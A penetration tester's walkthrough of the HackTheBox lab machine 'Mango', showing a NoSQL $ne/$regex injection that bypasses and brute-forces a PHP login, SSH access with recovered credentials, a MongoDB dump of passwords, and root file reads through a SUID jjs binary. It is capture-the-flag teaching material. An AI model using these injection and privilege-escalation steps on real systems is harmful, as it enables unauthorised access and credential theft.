Header Image

Roman Hergenreder

IT-Security Consultant / Penetration Tester

[machine avatar]

HackTheBox Mango - Writeup

OS: Linux
Release Date: 10/26/2019 19:00 PM
Points: 30
Difficulty: Medium
Last modified: 05/16/2024 17:09 PM + Give Respect

The request forwards us to home.php instead of just back to index.php. The login obviously worked and using the cookie, we can see the following screen. So nothing to see here, but with the knowledge the injection worked, we can do a structured bruteforce: In nosql, $regex can be used, to perform a search using regular expressions. We can simply build our password by iterating char-by-char. I wrote a little python script, which sends a request for every char, starting with ^a.*. I had to escape chars in this charset: .^$*+()[{\|?. After some time, the password was printed:
[mango home]
$ python exploit.py
(...)
trying: h3mXK8RhU~f\{]f5H
Using this password we can log in as user mango on the ssh port:
$ ssh mango@10.10.10.162
mango@10.10.10.162's password: h3mXK8RhU~f{]f5H
Welcome to Ubuntu 18.04.2 LTS (GNU/Linux 4.15.0-64-generic x86_64)

(...)
For the last step, we need to check the contents of the MongoDB again, which gives us another login:
mango@mango:~$ mongo
MongoDB shell version v4.0.12
connecting to: mongodb://127.0.0.1:27017/?gssapiServiceName=mongodb
(...)
> show dbs
admin 0.000GB
config 0.000GB
local 0.000GB
mango 0.000GB
> use mango
switched to db mango
> show tables
users
> db.getCollection("users").find()
{ "_id" : ObjectId("5d8e25334f3bf1432628927b"), "username" : "admin", "password" : "t9KcS3>!0B#2" }
{ "_id" : ObjectId("5d8e25364f3bf1432628927c"), "username" : "mango", "password" : "h3mXK8RhU~f{]f5H" }
Using the admin password we can login as the local user and obtain the user flag:
mango@mango:~$ su admin -s /bin/bash
Password: t9KcS3>!0B#2
admin@mango:/home/mango$ cat ~/user.txt
79bf31c6c6eb38a8567832f7f8b47e92

For root part, we firstly execute our information gathering tool: LinEnum.sh. As the output may be very big, i will just focus straight on the solution.
admin@mango:~$ bash LinEnum.sh
[+] Possibly interesting SUID files:
-rwsr-sr-- 1 root admin 10352 Jul 18 2019 /usr/lib/jvm/java-11-openjdk-amd64/bin/jjs
The command above will run with root privileges as the SUID bit is set, but we have to be in the admin group. jjs is said to invoking the Nashorn engine. Running this command, it will give us a CLI. Using jjs we can access java-packages and execute code. So we can simply create a FileReader and output the root flag:
admin@mango:~$ jjs
jjs> var FileReader = Java.type("java.io.FileReader");
jjs> var BufferedReader = Java.type("java.io.BufferedReader");
jjs> var olinkfile = "/root/root.txt";
jjs> var fr = new FileReader(olinkfile);
jjs> var br = new BufferedReader(fr);
jjs> print(br.readLine());
8a8ef79a7a2fbb01ea81688424e9ab15
jjs> br.close();

The name Mango was a big hint, that MongoDB was used. The used exploit worked due to the fact, that php transforms request parameters ending with [.*] into an array. $ne refers to not-equal. The executed request would look like this:
# Actual code:
$collection->find(array('user' => $_GET['user'], 'password' => $_GET['password']));

# GET http://staging-order.mango.htb/index.php?username=mango&password=test
$collection->find(array('user' => 'mango', 'password' => 'test'));

# GET http://staging-order.mango.htb/index.php?username=mango&password[$ne]=test
$collection->find(array('user' => 'mango', 'password' => array('$ne' => 'test')));